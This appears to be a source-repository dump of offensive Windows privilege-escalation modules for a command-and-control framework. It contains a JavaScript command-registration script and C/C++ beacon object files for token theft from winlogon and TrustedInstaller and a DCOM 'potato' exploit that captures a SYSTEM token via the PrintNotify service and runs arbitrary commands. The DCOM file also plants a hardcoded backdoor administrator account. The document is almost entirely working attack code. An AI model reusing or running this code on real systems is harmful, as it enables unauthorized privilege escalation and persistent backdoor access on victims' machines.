cmd_dcom_potato.addArgFlagString( "--run", "program", false, "Run new process in SYSTEM context (Program with arguments)");
cmd_dcom_potato.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let use_token = 0;
    let run_program = "";

    if(parsed_json["--token"]) { use_token = 1; }
    if("program" in parsed_json) { run_program = parsed_json["program"]; }

    if( (use_token && run_program.length) || (!use_token && run_program.length == 0) ) { throw new Error("Use only --token or --run"); }

    let bof_path = ax.script_dir() + "_bin/DCOMPotato." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("int,wstr", [use_token, run_program]);

    if (use_token) {
        let hook = function (task)
        {
            if(/Impersonate to SYSTEM succeeded/.test(task.text)) {
                ax.agent_set_impersonate(task.agent, "SYSTEM", true);
            }
            return task;
        }
        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF DCOMPotato: elevate to SYSTEM", hook);
    }
    else {
        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `BOF DCOMPotato: run ${run_program}`);
    }
});



var cmd_printspoofer = ax.create_command("potato-print", "LPE via Print Spooler (Named Pipe Impersonation)", "potato-print --token");
cmd_printspoofer.addArgBool( "--token", "Elevate the current agent to SYSTEM context");
cmd_printspoofer.addArgFlagString( "--run", "program", false, "Run new process in SYSTEM context (Program with arguments)");
cmd_printspoofer.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let use_token = 0;
    let run_program = "";

    if(parsed_json["--token"]) { use_token = 1; }
    if(parsed_json.hasOwnProperty("program")) { run_program = parsed_json["program"]; }

    if( (use_token && run_program.length) || (!use_token && run_program.length == 0) ) { throw new Error("Use only --token or --run"); }

    let bof_path = ax.script_dir() + "_bin/printspoofer." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("int,wstr", [use_token, run_program]);

    if (use_token) {
        let hook = function (task)
        {
            if(/Impersonate to SYSTEM succeeded/.test(task.text)) {
                ax.agent_set_impersonate(task.agent, "SYSTEM", true);
            }
            return task;
        }
        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF PrintSpoofer: elevate to SYSTEM", hook);
    }
    else {
        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `BOF PrintSpoofer: run ${run_program}`);
    }
});



var group_test = ax.create_commands_group("Elevation-BOF", [cmd_getsystem, cmd_uacbybass, cmd_dcom_potato, cmd_printspoofer]);
ax.register_commands_group(group_test, ["beacon", "gopher", "kharon"], ["windows"], []);



/// MENU

let system_access_action = menu.create_action("Get System", function(agents_id) { agents_id.forEach(id => ax.execute_command(id, "getsystem token")) });
menu.add_session_access(system_access_action, ["beacon", "gopher", "kharon"], ["windows"]);

================================================
FILE: Elevation-BOF/getsystem_token/getsystem_token.c
================================================
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "beacon.h"

WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI HANDLE  WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
WINBASEAPI HANDLE  WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINBASEAPI WINBOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE hExistingToken, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpTokenAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, PHANDLE phNewToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess);
WINBASEAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAccess);
WINBASEAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService, SC_STATUS_TYPE InfoLevel, LPBYTE lpBuffer, DWORD cbBufSize, LPDWORD pcbBytesNeeded);
WINBASEAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors);
WINBASEAPI DWORD WINAPI KERNEL32$SleepEx(DWORD dwMilliseconds, WINBOOL bAlertable);

int my_strcmp(const char *s1, const char *s2)
{
    while (*s1 && (*s1 == *s2)) {
        s1++;
        s2++;
    }
    return *(unsigned char*)s1 - *(unsigned char*)s2;
}

DWORD GetProcByPID(CHAR *name)
{
    HANDLE hSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    DWORD PID = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if(KERNEL32$Process32First(hSnap, &pe32)) {
        do {
            if(my_strcmp(pe32.szExeFile, name) == 0) {
                PID = pe32.th32ProcessID;
                break;
            }
        } while(KERNEL32$Process32Next(hSnap, &pe32));
    }

    KERNEL32$CloseHandle(hSnap);
    return PID;
}

DWORD GetTrustedInstallerPID()
{
    DWORD PID = 0;
    SC_HANDLE schManager = ADVAPI32$OpenSCManagerA(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT);
    if(schManager == NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "OpenSCManager failed. Error: %d\n", KERNEL32$GetLastError());
        return FALSE;
    }

    SC_HANDLE schService = ADVAPI32$OpenServiceA(schManager, "TrustedInstaller", SERVICE_QUERY_STATUS | SERVICE_START);
     if(schManager == NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "OpenService failed. Error: %d\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(schManager);
        return FALSE;
    }
    KERNEL32$CloseHandle(schManager);

    SERVICE_STATUS_PROCESS ssp;
    DWORD dwSize = 0;

    while(ADVAPI32$QueryServiceStatusEx(schService, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssp, sizeof(SERVICE_STATUS_PROCESS), &dwSize)) {
        if(ssp.dwCurrentState == SERVICE_STOPPED) {
            if(!ADVAPI32$StartServiceA(schService, 0, NULL)) {
                BeaconPrintf(CALLBACK_OUTPUT, "StartService failed. Error: %d\n", KERNEL32$GetLastError());
                KERNEL32$CloseHandle(schService);
                return FALSE;
            }
        }
        if(ssp.dwCurrentState == SERVICE_RUNNING) {
            PID = ssp.dwProcessId;
            break;
        }
        KERNEL32$SleepEx(5000, FALSE);
    }

    KERNEL32$CloseHandle(schService);
    return PID;
}

BOOL ImpersonateByPID(DWORD PID, HANDLE *hStorage)
{
    HANDLE hProc = KERNEL32$OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, PID);
    if(hProc == NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "OpenProcess on PID %d failed. Error: %d\n", PID, KERNEL32$GetLastError());
        return FALSE;
    }

    HANDLE hToken = NULL;
    if(!ADVAPI32$OpenProcessToken(hProc, TOKEN_DUPLICATE, &hToken)) {
        BeaconPrintf(CALLBACK_OUTPUT, "OpenProcessToken on PID %d failed. Error: %d\n", PID, KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hProc);
        return FALSE;
    }
    KERNEL32$CloseHandle(hProc);

    HANDLE hDup = NULL;
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = FALSE;

    if(!ADVAPI32$DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, &sa, SecurityImpersonation, TokenImpersonation, &hDup)) {
        BeaconPrintf(CALLBACK_OUTPUT, "DuplicateTokenEx on PID %d failed. Error: %d\n", PID, KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hToken);
        return FALSE;
    }
    KERNEL32$CloseHandle(hToken);

    if(!BeaconUseToken(hDup)) {
        BeaconPrintf(CALLBACK_OUTPUT, "Impersonation on PID %d failed. Error: %d\n", PID, KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hDup);
        return FALSE;
    }
    *hStorage = hDup;

    return TRUE;
}

BOOL ElevateSystem(HANDLE *hTokenSystem)
{
    DWORD PID = GetProcByPID("winlogon.exe");
    if(PID != 0){
        if(ImpersonateByPID(PID, hTokenSystem))
            return TRUE;
    }
    return FALSE;
}

BOOL ElevateTrustedInstaller(HANDLE *hTokenTrustedInstaller)
{
    DWORD PID = GetTrustedInstallerPID();
    if(PID != 0) {
        if(ImpersonateByPID(PID, hTokenTrustedInstaller)) {
            return TRUE;
        }
    }
    return FALSE;
}

void go(char *args, int len)
{
    formatp output;

    if(!BeaconIsAdmin()) {
        BeaconOutput(CALLBACK_ERROR, "The session must have administrator rights\n", 44);
        return;
    }

    HANDLE hTokenSystem = NULL;
    if(!ElevateSystem(&hTokenSystem))
      return;

    HANDLE hTokenTrustedInstaller = NULL;
    if(!ElevateTrustedInstaller(&hTokenTrustedInstaller))
      return;

    BeaconOutput(CALLBACK_OUTPUT, "Impersonate to SYSTEM & TrustedInstaller succeeded", 51);
}

================================================
FILE: Elevation-BOF/potato-dcom/DCOMPotato.cpp
================================================
#include <windows.h>
#include <stdio.h>
#include <ocidl.h>
#include <lm.h>
#include "bofdefs.h"
#include "beacon.h"

#define UNLEN 256

#define HANDLETOU(h) ((unsigned long)(ULONG_PTR)(h))
#define UTOHANDLE(h) ((void*)(UINT_PTR)(h))

DWORD token_value __attribute__((section (".data"))) = 0;

bool IsTokenSystem(HANDLE hToken)
{
	token_value = 0;
	DWORD Size, UserSize, DomainSize;
	SID* sid;
	SID_NAME_USE SidType;
	TCHAR UserName[64], DomainName[64];
	SECURITY_IMPERSONATION_LEVEL ImpersonationLevel = SecurityAnonymous;
	wchar_t* impersonationLevelstr = NULL;

	PTOKEN_USER user;
	DWORD ret_len = 0;
	DWORD dwLength = 0;
	LPWSTR sid_name;
	ADVAPI32$GetTokenInformation(hToken, TokenUser, NULL, dwLength, &dwLength);
	if (KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER)
	{
		user = (PTOKEN_USER)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLength);
		if (user == NULL)
		{
			KERNEL32$CloseHandle(hToken);
			return NULL;
		}
	}
	if (ADVAPI32$GetTokenInformation(hToken, TokenUser, user, dwLength, &dwLength)) {
		sid = (SID*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLength);
		ADVAPI32$ConvertSidToStringSidW(user->User.Sid, &sid_name);
	}
	else {
		BeaconPrintf(CALLBACK_ERROR, "Error getting token user %d\n", KERNEL32$GetLastError());
	}
	Size = 0;
	ADVAPI32$GetTokenInformation(hToken, TokenImpersonationLevel, &ImpersonationLevel, sizeof(SECURITY_IMPERSONATION_LEVEL), &Size);

	switch (ImpersonationLevel)
	{
	case SecurityAnonymous:
		impersonationLevelstr = (wchar_t*)L"Anonymous"; break;
	case SecurityIdentification:
		impersonationLevelstr = (wchar_t*)L"Identification"; break;
	case SecurityImpersonation:
		impersonationLevelstr = (wchar_t*)L"Impersonation"; break;
	case SecurityDelegation:
		impersonationLevelstr = (wchar_t*)L"Delegation"; break;
	}
	if (!MSVCRT$wcscmp(sid_name, L"S-1-5-18") && ImpersonationLevel >= SecurityImpersonation) {
		BeaconPrintf(CALLBACK_OUTPUT, "Obtained SYSTEM (%ls) token with impersonation level: %S\n", sid_name, impersonationLevelstr);
		return TRUE;
	}
	else {
		BeaconPrintf(CALLBACK_OUTPUT, "Obtained (%ls) token with impersonation level: %S\n", sid_name, impersonationLevelstr);
		return FALSE;
	}
	return FALSE;
}

BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{
	TOKEN_PRIVILEGES tp;
	LUID luid;
	if (!ADVAPI32$LookupPrivilegeValueA(NULL, priv, &luid)) {
		BeaconPrintf(CALLBACK_ERROR, "LookupPrivilegeValue() failed, error %u\n", KERNEL32$GetLastError());
		return FALSE;
	}

	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
		BeaconPrintf(CALLBACK_ERROR, "AdjustTokenPrivileges() failed, error %u\n", KERNEL32$GetLastError());
		return FALSE;
	}
	return TRUE;
}

//ref: https://www.codeproject.com/Articles/13601/COM-in-plain-C
typedef HRESULT STDMETHODCALLTYPE QueryInterfacePtr(IUnknown*, REFIID, void**);
typedef ULONG STDMETHODCALLTYPE AddRefPtr(IUnknown*);
typedef ULONG STDMETHODCALLTYPE ReleasePtr(IUnknown*);

typedef struct {
	QueryInterfacePtr* QueryInterface;
	AddRefPtr* AddRef;
	ReleasePtr* Release;
} IExampleVtbl;

typedef struct {
	IExampleVtbl* lpVtbl;
} IExample;

// Borrow from https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/ntapphelpcachecontrol/exploit/CaptureImpersonationToken.cpp
HRESULT STDMETHODCALLTYPE QueryInterface(IUnknown* This, REFIID riid, void** ppvObj)
{
	HANDLE hToken_SYSTEM = UTOHANDLE(token_value);
	HANDLE* m_ptoken = &hToken_SYSTEM;

	if (*m_ptoken == NULL) {
		HRESULT hr = OLE32$CoImpersonateClient();
		if (SUCCEEDED(hr)) {
			HANDLE hToken;
			if (ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), MAXIMUM_ALLOWED, FALSE, &hToken)) {
				PTOKEN_USER user;
				DWORD ret_len = 0;
				DWORD dwLength = 0;
				ADVAPI32$GetTokenInformation(hToken, TokenUser, NULL, dwLength, &dwLength);
				if (KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
					user = (PTOKEN_USER)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLength);
					if (user == NULL) {
						KERNEL32$CloseHandle(hToken);
						return NULL;
					}
				}

				if((*m_ptoken == NULL)) {
					*m_ptoken = hToken;
					token_value = HANDLETOU(*m_ptoken);
				}
				else {
					KERNEL32$CloseHandle(hToken);
				}
			}
			else {
				BeaconPrintf(CALLBACK_ERROR, "Error opening token %d\n", KERNEL32$GetLastError());
			}
		}
	}

	CLSID CLSID_IUnknown;
	wchar_t* szCLSID_IUnknown = L"{00000000-0000-0000-C000-000000000046}";
	OLE32$CLSIDFromString(szCLSID_IUnknown, &CLSID_IUnknown);
	if (OLE32$IsEqualGUID(riid, CLSID_IUnknown)) {
		*ppvObj = This;
	}
	else {
		*ppvObj = NULL;
		return E_NOINTERFACE;
	}

	return NOERROR;
}

ULONG STDMETHODCALLTYPE AddRef(IUnknown* This) { return 1; }

ULONG STDMETHODCALLTYPE Release(IUnknown* This) { return 1; }


// borrow from MultiPotato
bool CreateAdminUser()
{
	LPWSTR username = (LPWSTR)L"hagrid";
	LPWSTR password = (LPWSTR)L"P@ss@29hagr!d";

	USER_INFO_1 ui;
	DWORD dwLevel = 1;
	DWORD dwError = 0;
	DWORD nStatus;

	ui.usri1_name = username;
	ui.usri1_password = password;
	ui.usri1_priv = USER_PRIV_USER;
	ui.usri1_home_dir = NULL;
	ui.usri1_comment = NULL;
	ui.usri1_flags = UF_SCRIPT;
	ui.usri1_script_path = NULL;

	nStatus = NETAPI32$NetUserAdd(NULL, dwLevel, (LPBYTE)&ui, NULL);
	if (nStatus != 0) {
		BeaconPrintf(CALLBACK_ERROR, "NetUserAdd error: %d", nStatus);
		return false;
	}

	DWORD gStatus;
	LOCALGROUP_MEMBERS_INFO_3 gi;
	gi.lgrmi3_domainandname = ui.usri1_name;
	DWORD level = 3;
	DWORD totalentries = 1;

	nStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", level, (LPBYTE)&gi, totalentries);
	if (nStatus != 0) {
		BeaconPrintf(CALLBACK_ERROR, "NetLocalGroupAddMembers error: %d", nStatus);
		return false;
	}

	return true;
}

BOOL InitBackup()
{
	HANDLE hTokenCurrProc = NULL;
	BOOL flag = TRUE;

	ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrProc);
	if(!EnablePriv(hTokenCurrProc, SE_IMPERSONATE_NAME)) {
		BeaconPrintf(CALLBACK_ERROR, "SeImpersonatePrivilege properly not held\n");
		flag = FALSE;
		goto _CleanUp;
	}

_CleanUp:
	KERNEL32$CloseHandle(hTokenCurrProc);
	return flag;
}


BOOL EnumConectPoint()
{
	BOOL flag = TRUE;
	bool backupInit = false;
	ULONG num = 1;
	HRESULT hr = 0;
	ULONG d = 0;
	IConnectionPoint* arr;

	CLSID CLSID_PrintNotifyService;
	CLSID CLSID_IUnknown;
	wchar_t* szCLSID_PrintNotifyService = L"{854A20FB-2D44-457D-992F-EF13785D2B51}";
	wchar_t* szCLSID_IUnknown = L"{00000000-0000-0000-C000-000000000046}";
	IUnknown* pUnkown = NULL;

    IConnectionPointContainer* svc = NULL;
	CLSID CLSID_IConnectionPointContainer;
	wchar_t* szCLSID_IConnectionPointContainer = L"{B196B284-BAB4-101A-B69C-00AA00341D07}";
	IEnumConnectionPoints* pEnumConnectionPoints;
    IExample* example;
	IExampleVtbl IExample_Vtbl;

    hr = OLE32$CoInitialize(NULL);
    if (FAILED(hr)) {
    	BeaconPrintf(CALLBACK_ERROR, "CoInitialize fail, Error: 0x%08lx\n", hr);
        if (BeaconIsAdmin()) {
        	BeaconPrintf(CALLBACK_OUTPUT, "Attempt to initialize with CoInitializeEx alternatively\n");
            hr = OLE32$CoInitializeEx(NULL, COINIT_MULTITHREADED);
            if (FAILED(hr)) {
            	BeaconPrintf(CALLBACK_ERROR, "CoInitializeEx fail, Error: 0x%08lx\n", hr);
            }
           	backupInit = true;
		    }
    }

    if (!backupInit) {
    	hr = OLE32$CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_DYNAMIC_CLOAKING, NULL);
        if (hr != S_OK) {
        	BeaconPrintf(CALLBACK_ERROR, "CoInitializeSecurity fail, Error: 0x%08lx\n", hr);
            flag = FALSE;
            goto _CleanUp;
		}
    }

	OLE32$CLSIDFromString(szCLSID_PrintNotifyService, &CLSID_PrintNotifyService);
	OLE32$CLSIDFromString(szCLSID_IUnknown, &CLSID_IUnknown);

	hr = OLE32$CoCreateInstance(CLSID_PrintNotifyService, NULL, 4, CLSID_IUnknown, (void**)&pUnkown);
	if (hr != S_OK) {
		BeaconPrintf(CALLBACK_ERROR, "CoCreateInstance fail, Error: 0x%08lx\n", hr);
		flag = FALSE;
		goto _CleanUp;
	}

	OLE32$CLSIDFromString(szCLSID_IConnectionPointContainer, &CLSID_IConnectionPointContainer);
	hr = pUnkown->QueryInterface(CLSID_IConnectionPointContainer, (LPVOID*)&svc);
	if (hr != S_OK) {
		BeaconPrintf(CALLBACK_ERROR, "QueryInterface fail, Error: 0x%08lx\n", hr);
		flag = FALSE;
		goto _CleanUp;
	}

	hr = svc->EnumConnectionPoints(&pEnumConnectionPoints);
	if (hr != S_OK) {
		BeaconPrintf(CALLBACK_ERROR, "EnumConnectionPoints fail, Error: 0x%08lx\n", hr);
		flag = FALSE;
		goto _CleanUp;
	}
	svc->Release();

	hr = pEnumConnectionPoints->Next(num, &arr, (ULONG*)(&d));

	if (hr != S_OK) {
		BeaconPrintf(CALLBACK_ERROR, "Next fail, Error: 0x%08lx\n", hr);
		flag = FALSE;
		goto _CleanUp;
	}

	example = (IExample*)KERNEL32$GlobalAlloc(GMEM_FIXED, sizeof(IExample));
	IExample_Vtbl = { QueryInterface, AddRef, Release };
	example->lpVtbl = &IExample_Vtbl;
	do {
		if (arr != NULL)
		{
			arr->Advise((IUnknown*)example, &d);
			break;
		}
		hr = pEnumConnectionPoints->Next(num, &arr, (ULONG*)(&d));
	} while (hr == 0);

_CleanUp:
	OLE32$CoUninitialize();
	return flag;
}


VOID GetHigh(wchar_t* wProcessPath, wchar_t* wCommandLine, int method)
{
	HANDLE hTokenLogon = NULL;
	HANDLE hToken_SYSTEM = NULL;

	SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = TRUE;
    sa.lpSecurityDescriptor = NULL;
    STARTUPINFOW startupInfo = { 0 };
    PROCESS_INFORMATION processInfo = { 0 };
    startupInfo.cb = sizeof(startupInfo);

	if(!InitBackup())
		goto _CleanUp;

	if (!ADVAPI32$LogonUserA("A", "A", "A", LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hTokenLogon) || !BeaconUseToken(hTokenLogon)) {
		BeaconPrintf(CALLBACK_ERROR, "LogonUser and impersonate failed: %d\n", KERNEL32$GetLastError());
		goto _CleanUp;
	}

	if(!EnumConectPoint())
		goto _CleanUp;

	hToken_SYSTEM = UTOHANDLE(token_value);

	if (!IsTokenSystem(hToken_SYSTEM)) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to obtain SYSTEM token with proper impersonate level!");
		goto _CleanUp;
	}

	if (method == 2) {
		//According to document, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.
		EnablePriv(hToken_SYSTEM, SE_INCREASE_QUOTA_NAME);
		EnablePriv(hToken_SYSTEM, SE_ASSIGNPRIMARYTOKEN_NAME);
		BeaconUseToken(hToken_SYSTEM);
		if (!ADVAPI32$CreateProcessAsUserW(hToken_SYSTEM, wProcessPath, wCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &startupInfo, &processInfo)) {
			BeaconPrintf(CALLBACK_ERROR, "CreateProcessAsUserW failed: %d\n", KERNEL32$GetLastError());
			goto _CleanUp;
		}
		BeaconPrintf(CALLBACK_OUTPUT, "Command executed with CreateProcessAsUserW successfully\n");
	}
	else if (method == 3) {
		BeaconUseToken(hToken_SYSTEM);
		if (CreateAdminUser())
			BeaconPrintf(CALLBACK_OUTPUT, "User hagrid with password P@ss@29hagr!d has been added into administrators");
		goto _CleanUp;
	}
	else{
		if (!ADVAPI32$CreateProcessWithTokenW(hToken_SYSTEM, 0, wProcessPath, wCommandLine, CREATE_NO_WINDOW, 0, NULL, &startupInfo, &processInfo)) {
			BeaconPrintf(CALLBACK_ERROR, "CreateProcessWithTokenW failed: %d\n", KERNEL32$GetLastError());
			goto _CleanUp;
		}
		BeaconPrintf(CALLBACK_OUTPUT, "Command executed with CreateProcessWithTokenW successfully\n");
	}

_CleanUp:
	BeaconRevertToken();
	if(hTokenLogon)   KERNEL32$CloseHandle(hTokenLogon);
	if(hToken_SYSTEM) KERNEL32$CloseHandle(hToken_SYSTEM);
}


void go(char* args, int alen)
{
	datap parser;
	BeaconDataParse(&parser, args, alen);
	ULONG useToken  = BeaconDataInt(&parser);
	WCHAR* wCmdline = (WCHAR*) BeaconDataExtract(&parser, NULL);

	HANDLE hToken_SYSTEM = NULL;
	HANDLE hTokenLogon   = NULL;

	SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = TRUE;
    sa.lpSecurityDescriptor = NULL;
    STARTUPINFOW startupInfo = { 0 };
    PROCESS_INFORMATION processInfo = { 0 };
    startupInfo.cb = sizeof(startupInfo);

	if(!InitBackup())
		return;

	if (!ADVAPI32$LogonUserA("A", "A", "A", LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hTokenLogon) || !BeaconUseToken(hTokenLogon)) {
		BeaconPrintf(CALLBACK_ERROR, "LogonUser and impersonate failed: %d\n", KERNEL32$GetLastError());
		goto _CleanUp;
	}

	if(!EnumConectPoint())
		goto _CleanUp;

	hToken_SYSTEM = UTOHANDLE(token_value);

	if (!IsTokenSystem(hToken_SYSTEM)) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to obtain SYSTEM token with proper impersonate level!");
		goto _CleanUp;
	}

	if (useToken) {
		BeaconUseToken(hToken_SYSTEM);
		BeaconOutput(CALLBACK_OUTPUT, "Impersonate to SYSTEM succeeded", 32);
		if(hTokenLogon) KERNEL32$CloseHandle(hTokenLogon);
		return;
	}
	else {
		if (!ADVAPI32$CreateProcessWithTokenW(hToken_SYSTEM, 0, NULL, wCmdline, CREATE_NO_WINDOW, 0, NULL, &startupInfo, &processInfo)) {
			EnablePriv(hToken_SYSTEM, SE_INCREASE_QUOTA_NAME);
			EnablePriv(hToken_SYSTEM, SE_ASSIGNPRIMARYTOKEN_NAME);
			BeaconUseToken(hToken_SYSTEM);
			if (!ADVAPI32$CreateProcessAsUserW(hToken_SYSTEM, NULL, wCmdline, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &startupInfo, &processInfo)) {
				BeaconPrintf(CALLBACK_ERROR, "CreateProcessWithTokenW & CreateProcessAsUserW failed: %d\n", KERNEL32$GetLastError());
				goto _CleanUp;
			} else {
				BeaconPrintf(CALLBACK_OUTPUT, "Command executed with CreateProcessAsUserW successfully\n");
			}
		}
		else {
			BeaconPrintf(CALLBACK_OUTPUT, "Command executed with CreateProcessWithTokenW successfully\n");
		}
	}

_CleanUp:
	BeaconRevertToken();
	if(hTokenLogon)   KERNEL32$CloseHandle(hTokenLogon);
	if(hToken_SYSTEM) KERNEL32$CloseHandle(hToken_SYSTEM);
}

================================================
FILE: Elevation-BOF/potato-dcom/bofdefs.h
================================================
#pragma once
#include <windows.h>

extern "C" {

#include "beacon.h"

void go(char* buff, int len);


WINADVAPI DWORD WINAPI ADVAPI32$GetLengthSid(PSID Sid);
WINADVAPI BOOL WINAPI ADVAPI32$CopySid(DWORD nDestinationSidLength, PSID pDestinationSid, PSID pSourceSid);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueA(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
DECLSPEC_IMPORT HRESULT  WINAPI OLE32$CoImpersonateClient();
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI ADVAPI32$OpenThreadToken(HANDLE, DWORD, BOOL, PHANDLE);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread(void);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI ADVAPI32$RevertToSelf(void);
DECLSPEC_IMPORT void WINAPI MSVCRT$free(void*);
DECLSPEC_IMPORT long WINAPI KERNEL32$InterlockedIncrement(LONG volatile* Addend);
DECLSPEC_IMPORT HRESULT	 WINAPI	  OLE32$CoInitialize(LPVOID pvReserved);
DECLSPEC_IMPORT HRESULT  WINAPI   OLE32$CoInitializeEx(LPVOID, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE TokenHandle);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LogonUserA(LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithTokenW(HANDLE hToken, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessAsUserW(HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINADVAPI BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINADVAPI BOOL WINAPI ADVAPI32$ConvertSidToStringSidW(PSID Sid, LPWSTR* StringSid);
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL);
WINADVAPI BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINADVAPI BOOL WINAPI OLE32$IsEqualGUID(REFGUID rguid1, REFGUID rguid2);
DECLSPEC_IMPORT HGLOBAL  WINAPI KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes);
